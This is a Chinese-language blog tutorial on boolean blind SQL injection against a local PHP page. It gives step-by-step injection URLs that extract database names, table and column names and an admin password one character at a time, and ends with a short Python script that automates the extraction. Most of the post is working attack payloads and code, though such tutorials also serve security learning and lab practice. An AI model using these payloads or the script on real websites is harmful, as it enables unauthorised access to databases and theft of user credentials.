SQL注入--盲注入(bool型)

原創 liukenn 2018-08-25 01:27

一个带GET参数的网站,但是网页中没有返回任何查询结果和报错信息,只返回对和错:




盲注入格式:

http://127.0.0.1/index.php?id=1' and ascii(substr(
(SQL语句),1,1
))=ASCII%23

注:

SQL语句 输入SQL注入语句;

ASCII 返回的字符的ASCII码;

1 第一个字母,从1开始算起;

ASCII码可以根据二分法猜测;

详情可以了解sql的substr()语法;


爆库名(sql)的第1个字母:
http://127.0.0.1/index.php?id=1' and ascii(substr(
(select schema_name from information_schema.schemata limit 4,1),1,1
))=115%23

注:

limit 4,1)1,1  表示查询第5个数据库名字的第1个字母;

115 为s的ASCII码;

另:

limit 0,1)1,1  表示查询第0个数据库名字的第1个字母;

limit 1,1)2,1  表示查询第2个数据库名字的第2个字母;

limit 1,1)4,1  表示查询第2个数据库名字的第4个字母;



爆库名(sql)的第2个字母:
http://127.0.0.1/index.php?id=1' and ascii(substr(
(select schema_name from information_schema.schemata limit 4,1),2,1
))=113%23

注:

limit 4,1)2,1  表示查询第5个数据库名字的第2个字母;

113 为q的ASCII码;


爆库名(sql)的第3个字母:
http://127.0.0.1/index.php?id=1' and ascii(substr(
(select schema_name from information_schema.schemata limit 4,1),3,1
))=108%23

注:

limit 4,1)3,1  表示查询第5个数据库名字的第3个字母;

108 为l的ASCII码;


爆sql数据库的第1个表名(user)的第1个字母:
http://127.0.0.1/index.php?id=1' and ascii(substr(
(select table_name from information_schema.tables where table_schema=0x73716climit0,1),1,1
))=117%23

注:

0x73716c 为sql的十六进制编码;

117 为u的ASCII码;

limit 用法参考上文



爆sql数据库user表的第3个字段(pwd)的第1个字母:
http://127.0.0.1/index.php?id=1' and ascii(substr(
(select column_name from information_schema.columns where table_schema=0x73716cand table_name=0x75736572limit 2,1),1,1
))=112%23
注:

0x73716c 为sql的十六进制编码

0x75736572 为user的十六进制编码;

112  为p的ASCII码;

limit 用法参考上文



爆第3个字段pwd(123321)的内容的第一个字母:
http://127.0.0.1/index.php?id=1' and ascii(substr(
(select pwd from sql.userlimit0,1),1,1
))=49%23
注:

49  为1的ASCII码

limit 用法参考上文;



最终拿到admin的password!


盲注入可以使用python脚本更方便!

这里贴一小段简单的python盲注入脚本:

import requests
urltest="http://127.0.0.1/index.php?id=1' and ascii(substr((select user()),1,1))=114%23" #验证页面,通常为正确页面
URL=requests.get(urltest)
for j in range(1,10):
	for i in range(33,125):
		i=str(i)
		j=str(j)
		url="http://127.0.0.1/index.php?id=1' and ascii(substr((select user()),"+j+",1))="+i+"%23" #注入用于比对的URL
		#print url
		url=requests.get(url)
		if url.text==URL.text:
			print chr(int(i))


以上脚本代码通过修改url中的 select user() SQL语句即可方便盲注入!


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

redtigerSQL注入

一生所爱丶 2018-08-27 13:00:31

【Kali Web渗透测试】手动漏洞挖掘—SQL注入 猜测数据库列名、表名、库名、字段内容

Dalvin_jean 2018-08-26 23:55:31

【Kali Web渗透测试】手动漏洞挖掘——复杂语句查询&读写文件和下载数据库

Dalvin_jean 2018-08-26 23:55:29

实验吧-因缺思汀的绕过

LDDP 2018-08-26 04:35:31

sql注入--入门篇

n4nch3ng 2018-08-25 21:51:51

SQL注入学习 -- sqli-labs lesson 1

L1am3s 2018-08-25 18:45:13

SQL注入--GET注入

liukenn 2018-08-25 01:27:54

SQL注入--盲注入(time型)

liukenn 2018-08-25 01:27:41

SQL注入--报错注入

liukenn 2018-08-25 01:27:40

SQL注入学习(一)

tata_qing 2018-08-24 11:27:54

SQL注入-文件操作

斯利普 2018-08-24 06:42:54

SQL注入-盲注

斯利普 2018-08-24 06:42:54

SQL注入-有回显的注入

斯利普 2018-08-24 06:42:54

SQL注入-注入点判断

斯利普 2018-08-24 06:42:53

SQL注入-宽字节注入

斯利普 2018-08-24 06:42:37